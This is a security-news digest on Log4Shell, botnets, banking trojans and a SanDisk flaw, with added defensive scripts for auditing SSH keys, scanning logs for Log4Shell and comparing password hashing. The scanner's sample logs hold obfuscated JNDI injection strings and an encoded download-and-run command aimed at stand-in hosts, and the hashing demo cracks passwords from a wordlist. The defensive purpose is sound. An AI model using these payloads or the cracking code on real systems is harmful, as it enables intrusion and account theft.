December 13, 2021

Fortify Security Team

Title: The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues.

Date Published: December 13, 2021

Excerpt: “The CVE-2021-44228 flaw made the headlines last week, after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library. The impact of the issue is devastating: thousands of organizations worldwide are potentially exposed to attacks, and security experts have already reported exploitation attempts in the wild. CISA also warns of a recently disclosed arbitrary file download vulnerability in FortiOS, tracked as CVE-2021-44168, that is actively exploited.”

Title: Log4j Flaw: Attackers Are Making Thousands of Attempts to Exploit This Severe Vulnerability

Date Published: December 13, 2021

Excerpt: “Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there are also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of crypto mining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.”

Title: Two Linux Botnets Already Exploit Log4Shell Flaw in Log4j

Date Published: December 13, 2021

Excerpt: “The attackers used a .uy top-level domain for the C2 infrastructure, which is uncommon. The Muhstik variant used in the attacks includes a backdoor module, ldm, which adds an SSH backdoor public key to allow remote connections to the server. After the public key is added to the ~/.ssh/authorized_keys file, the attacker can directly log into the remote server without password authentication. Experts pointed out that Muhstik uses the TOR network for its reporting mechanism. “Before accessing the TOR network, Muhstik queries relay.l33t-ppl.inf through some publicly available DoH services. During this process, a number of DNS requests are generated.” reads the post published by NetLab 360.”
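The persistence mechanism described above (a public key appended to ~/.ssh/authorized_keys) is cheap to hunt for: fingerprint every key in the file and compare against the set of keys you issued. The script below is an added example written for this digest, not code from NetLab 360 or from the Muhstik sample. The key blobs, the file contents and the "approved" set are constructed in the script so it runs offline; the fingerprint format matches what `ssh-keygen -lf` prints, so a real allow-list can be built from that command's output.

```python
import base64
import hashlib
import re


def ssh_fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint of a wire-format public key, in the form ssh-keygen -lf prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def _ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length followed by the bytes."""
    return len(data).to_bytes(4, "big") + data


def ed25519_blob(raw_pub: bytes) -> str:
    """Build a wire-format ssh-ed25519 public key blob from 32 raw bytes (constructed sample key)."""
    assert len(raw_pub) == 32
    return base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(raw_pub)).decode()


# Constructed keys with deterministic bytes; these are not real keys from any host.
ADMIN_BLOB = ed25519_blob(bytes(range(32)))
BACKUP_BLOB = ed25519_blob(bytes(range(64, 96)))
ROGUE_BLOB = ed25519_blob(bytes(range(32, 64)))

# Constructed ~/.ssh/authorized_keys content, not a captured file. Line 3 is the
# kind of bare, uncommented key a backdoor module drops in.
SAMPLE_AUTHORIZED_KEYS = f"""# ops team
ssh-ed25519 {ADMIN_BLOB} admin@bastion
ssh-ed25519 {ROGUE_BLOB}
command="/usr/bin/backup.sh",no-pty ssh-ed25519 {BACKUP_BLOB} backup@nas
"""

# authorized_keys line: [options] key-type base64-blob [comment]
_KEY = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-ssh-ed25519@openssh\.com)"
    r"\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)


def parse_authorized_keys(text: str):
    """Split an authorized_keys file into entries; unparseable lines are reported, not skipped."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _KEY.search(line)
        if not m:
            entries.append({"line": n, "error": "unparseable"})
            continue
        entries.append({
            "line": n,
            "options": line[:m.start()].strip(),   # everything before the key type
            "type": m.group(1),
            "fingerprint": ssh_fingerprint(m.group(2)),
            "comment": (m.group(3) or "").strip(),
        })
    return entries


def audit(text: str, approved: set):
    """Return one finding per key whose fingerprint is not in the approved set."""
    findings = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append({"line": e["line"], "reason": "unparseable line", "fingerprint": None})
        elif e["fingerprint"] not in approved:
            reason = "fingerprint not in approved set"
            if not e["comment"]:
                reason += "; no comment"
            findings.append({"line": e["line"], "reason": reason, "fingerprint": e["fingerprint"]})
    return findings


if __name__ == "__main__":
    approved = {ssh_fingerprint(ADMIN_BLOB), ssh_fingerprint(BACKUP_BLOB)}
    for f in audit(SAMPLE_AUTHORIZED_KEYS, approved):
        print(f)
```

Against real hosts, feed `audit()` the contents of every user's authorized_keys (root's and service accounts' included) and build `approved` from the `SHA256:...` column of `ssh-keygen -lf` over the keys you actually issued; a key that is not on that list is the finding, whatever its comment says.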

Title: Hackers Start Pushing Malware in Worldwide Log4Shell Attacks

Date Published: December 12, 2021

Excerpt: “As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below. The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts. This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.”
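The three Log4Shell items above (the CISA entry, the Sophos/Microsoft report and the Kinsing campaign) all come down to the same thing on the wire: a `${jndi:...}` lookup string planted in a logged request field, often URL-encoded or wrapped in nested lookups such as `${${lower:j}ndi:...}`, with the command to run carried Base64-encoded in the LDAP path. The scanner below is an added example written for this digest, not code from any of the cited vendors. The access-log lines, the attacker addresses (198.51.100.7, 203.0.113.4) and the Base64 payload are constructed; the `/Basic/Command/Base64/<payload>` path form is the shape used by widely circulated JNDI exploit kits and is assumed here as the format to decode.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not captured traffic). Line 2 carries a
# Base64-encoded download-and-run command in the LDAP path; line 3 uses nested
# lookups to hide the "jndi" token; line 4 is the lookup URL-encoded in the path.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/'
    'd2dldCAtcSAtTyAtIGh0dHA6Ly8xOTguNTEuMTAwLjcvbGguc2ggfCBiYXNo}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:${::-l}dap://198.51.100.7:1389/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [13/Dec/2021:10:02:11 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.4%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "python-requests/2.25"',
]

# Innermost lookups that evaluate to a literal: ${lower:j}, ${upper:j}, ${::-j},
# ${env:NOPE:-j}, ${sys:NOPE:-j}. Resolving them repeatedly exposes the real string.
_INNER = re.compile(r"\$\{(?:(?:lower|upper):|(?:env|sys|main):[^:{}]*:-|::-)([^${}]*)\}", re.I)

# The lookup itself: scheme, callback host:port and optional path.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*//([^/}\s]+)(/[^}\s]*)?\}",
    re.I,
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and nested-lookup obfuscation until the string stops changing."""
    for _ in range(max_rounds):
        decoded = _INNER.sub(lambda m: m.group(1), unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def decode_command(path: str):
    """Decode a /Base64/<payload> path segment (assumed exploit-kit format) if present."""
    m = re.search(r"/Base64/([A-Za-z0-9+/=]+)", path or "", re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError
        return None


def scan_line(line: str):
    """Return a finding for a line carrying a JNDI lookup, or None for a clean line."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    scheme, host, path = m.group(1).lower(), m.group(2), m.group(3) or ""
    return {
        "src": line.split(" ", 1)[0],
        "scheme": scheme,
        "callback": host,                        # where the victim would connect out to
        "obfuscated": m.group(0) not in line,    # lookup only visible after normalization
        "command": decode_command(path),
    }


def scan(lines):
    return [f for f in map(scan_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The `callback` field is the useful pivot: outbound LDAP/RMI connections from an application server to that host are the sign that a logged request was actually evaluated rather than merely received, and the decoded `command` tells you what the follow-on download was. Matching on the literal string `jndi` alone misses lines 3 and 4.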

Title: Arrest in Romania of a Ransomware Affiliate Scavenging for Sensitive Data

Date Published: December 13, 2021

Excerpt: “Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors. The 41-year-old Romanian national was arrested Monday morning at his home in Craiova, Romania, by the DIICOT (the Romanian Directorate for Investigating Organized Crime and Terrorism) and judicial police officers, on suspicions of unauthorized access to a computer system, unauthorized transfer of computer data, illegal interception of a computer transmission, and blackmail.”

Title: Malicious PyPI Packages with over 10,000 Downloads Taken Down

Date Published: December 13, 2021

Excerpt: “The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers’ report. This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.”

Title: TinyNuke Banking Malware Targets French Entities

Date Published: December 13, 2021

Excerpt: “Proofpoint identified multiple recent campaigns leveraging invoice-themed lures to distribute the uncommonly observed TinyNuke malware. The activity marks a stark reappearance of this threat, which has not been seen with regularity since 2018. The campaigns target hundreds of customers in various industries including manufacturing, technology, construction, and business services. The campaigns use French language lures with invoice or other financial themes, and almost exclusively target French entities and companies with operations in France.”

Title: Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan

Date Published: December 13, 2021

Excerpt: “Infection chains associated with the multi-purpose Qakbot malware have been broken down into “distinct building blocks,” an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a “customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it.” Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.”

Title: US, Australia and Japan Stump up for Subsea Cable between Nauru, Kiribati and Federated States of Micronesia

Date Published: December 12, 2021

Excerpt: “The United States, Australia, and Japan have said they will provide funding for a new subsea cable to connect the Pacific island nations of Nauru, Kiribati, and Federated States of Micronesia (FSM). The new cable will connect the island containing the capital of Kiribati with Nauru and the island of Kosrae in FSM, before connecting with the Hantru-1 cable at the island of Pohnpei in FSM. A joint statement between the six nations said the cable would provide better connectivity to 100,000 people across the three Pacific nations.”

Title: Western Digital SanDisk SecureAccess Flaws Allow Brute Force and Dictionary Attacks

Date Published: December 11, 2021

Excerpt: “The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user’s private vault is protected by a personal password, and all the files are automatically encrypted. According to the vendor, SanDisk SecureAccess version 3.02 was using a one-way cryptographic hash with a predictable salt. This means that the software is vulnerable to dictionary attacks. The software also uses a password hash with insufficient computational effort; as a consequence, an attacker can brute force user passwords leading to unauthorized access to user data.”
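The two weaknesses in the advisory above, a predictable salt and a hash with too little computational effort, are easiest to see side by side. The script below is an added example written for this digest; it models the described weaknesses with a plain SHA-256 over a fixed salt and is not SanDisk's actual implementation, whose algorithm the advisory does not name. The wordlist and the "vault" passwords are constructed. The hardened variant uses a per-vault random salt with scrypt, the memory-hard KDF in Python's standard library; its parameters (N=2^14, r=8, p=1) are this example's choice, not a vendor recommendation.

```python
import hashlib
import hmac
import os
import time

# Constructed wordlist standing in for a real dictionary; the entries are illustrative.
WORDLIST = ["password", "123456", "qwerty", "letmein", "sunshine1", "dragon"]

# --- Weak scheme, modelled on the advisory: one fast hash, a salt every attacker
# knows in advance (assumed fixed string for this model), no work factor.
PREDICTABLE_SALT = b"SecureAccess"


def weak_hash(password: str) -> bytes:
    return hashlib.sha256(PREDICTABLE_SALT + password.encode()).digest()


def crack_weak(target: bytes, wordlist):
    """With a known salt one precomputed table answers every vault; each lookup is free."""
    table = {weak_hash(w): w for w in wordlist}   # built once, reused across all targets
    return table.get(target)


# --- Hardened scheme: per-vault random salt plus a memory-hard KDF.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1      # about 16 MiB and tens of ms per guess


def strong_hash(password: str, salt: bytes = None):
    """Return (salt, key); a fresh 16-byte salt is drawn when none is supplied."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return salt, key


def verify_strong(password: str, salt: bytes, key: bytes) -> bool:
    return hmac.compare_digest(strong_hash(password, salt)[1], key)


def crack_strong(salt: bytes, key: bytes, wordlist):
    """No table can be reused: every guess pays the full KDF cost for this vault's salt."""
    for w in wordlist:
        if verify_strong(w, salt, key):
            return w
    return None


def guesses_per_second(hasher, seconds: float = 0.5) -> float:
    """Rough throughput of one hashing function, to compare the two schemes' cost per guess."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        hasher("guess%d" % n)
        n += 1
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    print("weak scheme:  %.0f guesses/s" % guesses_per_second(weak_hash))
    salt = os.urandom(16)
    print("scrypt:       %.1f guesses/s" % guesses_per_second(lambda p: strong_hash(p, salt)))
    print("weak vault cracked:  ", crack_weak(weak_hash("sunshine1"), WORDLIST))
    salt, key = strong_hash("sunshine1")
    print("strong vault cracked:", crack_strong(salt, key, WORDLIST), "(only because the word is in the list)")
```

Running it shows the weak scheme in the millions of guesses per second versus tens for scrypt, and, because the weak salt is shared, two vaults with the same password produce the same hash, so one cracked vault gives away the other. The hardened scheme only helps against a dictionary if the password is not in the dictionary; the work factor buys time, not immunity.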
